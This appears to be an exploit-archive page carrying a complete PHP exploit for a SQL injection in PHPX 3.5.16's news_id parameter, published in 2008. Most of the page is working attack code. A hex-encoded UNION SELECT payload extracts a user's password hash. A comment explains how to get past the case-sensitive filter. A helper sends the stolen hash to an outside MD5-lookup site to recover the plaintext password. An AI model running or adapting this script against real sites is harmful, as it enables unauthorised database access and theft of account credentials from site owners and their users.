[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHPX 3.5.16 (news_id) Remote SQL Injection Exploit
# Published : 2008-11-05
# Author : StAkeR
# Previous Title : phpBB Mod Small ShoutBox 1.4 Remote Edit/Delete Messages Vuln
# Next Title : Pre Podcast Portal (Tour.php id) SQL Injection Vulnerability


<?php

error_reporting(0);
ini_set("default_socket_timeout",5);
set_time_limit(0);



/*
   ---------------------------------------------------
   PHP X 3.5.16 (news_id) Remote SQL Injection Exploit
   ---------------------------------------------------
   By StAkeR[at]hotmail[dot]it
   Download On http://www.phpx.org/project.php
   NOTE: Magic_Quotes_GPC OFF
   ---------------------------------------------------
   
   File (admin/includes/news.inc.php)
   
   1. <?php
   2. #$Id: news.inc.php,v 1.46 2006/12/18 05:51:47 ryan Exp $
   3.
   4.
   5. class newsModule{
   6.
   7. function newsModule(){
   8.
   9.
  10.
  11. $this->action = $_GET['action'];
  12. $this->news_id = $_GET['news_id'];
  13.
  14. global $userinfo;
  15. global $core;
  16.
  17. $this->core = $core;
  18.
  19. $this->userinfo = $userinfo;
  20.
  21.
  22.
  23.
  24. if (!$this->userinfo){ DIE("HACK ATTEMPT"); }
  25. if ($this->userinfo[news] != 1){ DIE("NO ACCESS TO THIS MODULE"); }
  26.
  27. include("includes/text.inc.php");
  28. $this->textFun = new textFunctions();
  29. $this->newsCat = $this->core->db->dbCall("news_categories");
  30. if ($this->news_id == ''){ $this->news_id = $_POST['news_id']; }
  31.
  32. switch($this->action){
  33. case "catrss":
  34. $this->catRSS();
  35. break;
      ...
   
   i've found other bugs..:D
  

   news.php?action=view&news_id=1 ' union all select 1,2,username,4,5,password,7,8 from users where user_id=1/*
   Result? HACKING ATTEMPT...but this fix is very stupid because isn't case sensitive...
   news.php?action=view&news_id=1 ' UNION ALL SELECT 1,2,username,4,5,password,7,8 from users where user_id=1/*
   
 
  
*/   


$search = new search;


if(preg_match('/http://(.+?)/i',$argv[1]) or !is_numeric($argv[2])) $search->argv();


$uid = intval($argv[2]);
$host = explode('/',$argv[1]);
$search->magic();

$code = "x31x25x32x30x25x32x37x25x32".
        "x30x55x4Ex49x4Fx4Ex25x32x30".
        "x41x4Cx4Cx25x32x30x53x45x4C".
        "x45x43x54x25x32x30x31x25x32".
        "x43x32x25x32x43x75x73x65x72".
        "x6Ex61x6Dx65x25x32x43x34x25".
        "x32x43x35x25x32x43x70x61x73".
        "x73x77x6Fx72x64x25x32x43x37".
        "x25x32x43x38x25x32x30x66x72".
        "x6Fx6Dx25x32x30x75x73x65x72".
        "x73x25x32x30x77x68x65x72x65".
        "x25x32x30x75x73x65x72x5Fx69".
        "x64x25x33x44".$uid."x25x32x33";
        


$data .= "GET /$host[1]/news.php?action=view&news_id=$code HTTP/1.1rn"; 
$data .= "Host: $host[0]rn";
$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)rn";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$data .= "Accept-Language: en-us,en;q=0.5rn";
$data .= "Accept-Encoding: gzip,deflatern";
$data .= "Connection: closernrn";
    
  
  
if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) die("socket_create() error!rn");
if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1)) die("socket_set_option() error!rn"); 
if(!socket_connect($socket,gethostbyname($host[0]),80)) die("socket_connect() error!rn");
if(!socket_write($socket,$data,strlen($data))) die("socket_write() errror!rn");

while($html = socket_read($socket,1024,PHP_NORMAL_READ)) 
{ 
  $content .= $html; 
} socket_close($socket);



if(preg_match('/<br><br>([0-9a-f]{32})/',$content,$result))
{
  echo "[+] Exploit Successfully!rn";
  echo "[+] Hash: $result[1]rn";
  echo $search->md5($result[1]);

}
else
{
  echo "[+] Exploit Failed!rn";
  echo "[+] Site Not Vulnerable / ID Not Valid!rn";
  exit;
}

class search
{
  function md5($hash)
  {
    if(strlen($hash) != 32) die("hash not valid!rn");
  
    $data .= "GET /?p&submit&s=md5&q=$hash&_= HTTP/1.1rn"; 
    $data .= "Host: md5.rednoize.comrn";
    $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)rn";
    $data .= "Connection: closernrn";
  
    if(!$socket = fsockopen('md5.rednoize.com',80)) die("fsockopen() error!n");  
    if(!fputs($socket,$data)) die("fputs() error!n");


    while(!feof($socket))
    {
      $content .= fgets($socket);
    } fclose($socket);
  
    $result = explode(' ',$content);
  
    if(isset($result[19]))
    {
      return "[+] Password: ".substr($result[19],20,-6)."rn";
    }
  }
  
  function argv()
  {
    echo "[+] PHP X 3.5.16 (news_id) Remote SQL Injection Exploitrn";
    echo "[+] Usage: php $argv[0] [host/path] [user_id]rn";
    echo "[+] Usage: php $argv[0] localhost/phpx 1rn";
    exit;
  }
  
  function magic()
  {
    global $host;
    
    $data .= "GET /$host[1]/news.php?action=view&news_id=' HTTP/1.1rn"; 
    $data .= "Host: $host[0]rn";
    $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)rn";
    $data .= "Connection: closernrn";
  
    if(!$socket = fsockopen($host[0],80)) die("fsockopen() error!n");  
    if(!fputs($socket,$data)) die("fputs() error!n");

    while(!feof($socket))
    {
      $content .= fgets($socket);
    } fclose($socket);
    
    if(!eregi('error in your SQL',$content))
    {
      echo "[+] Magic Quotes On!rn[+] Exploit Failed!rn";
      exit;
    }
  }
}

# www.Syue.com [2008-11-05]